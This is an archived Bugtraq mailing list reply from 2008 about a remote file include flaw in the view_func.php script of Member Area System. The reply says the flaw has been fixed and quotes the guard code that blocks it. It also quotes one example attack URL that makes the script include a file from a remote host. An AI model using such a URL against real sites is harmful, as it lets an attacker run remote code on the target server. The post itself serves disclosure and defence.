Bugtraq mailing list archives
Re: Member Area System (MAS) Remote File Include Vulnerability (view_func.php)
From: m3venge () yahoo com
Date: 18 Jan 2008 17:01:36 -0000
in the latest version this is already fixed, for almost a year. if (strpos ($_SERVER['PHP_SELF'], 'view_func.php') !== false) { exit (); } before the include! http://affectedsite.com/view_func.php?i=http://remotesite.com/justsomedi r/&l=testfile.txt? view_func.php will exit before the include.
Current thread:
- Member Area System (MAS) Remote File Include Vulnerability (view_func.php) ship_nx (Jan 11)
- <Possible follow-ups>
- Re: Member Area System (MAS) Remote File Include Vulnerability (view_func.php) m3venge (Jan 18)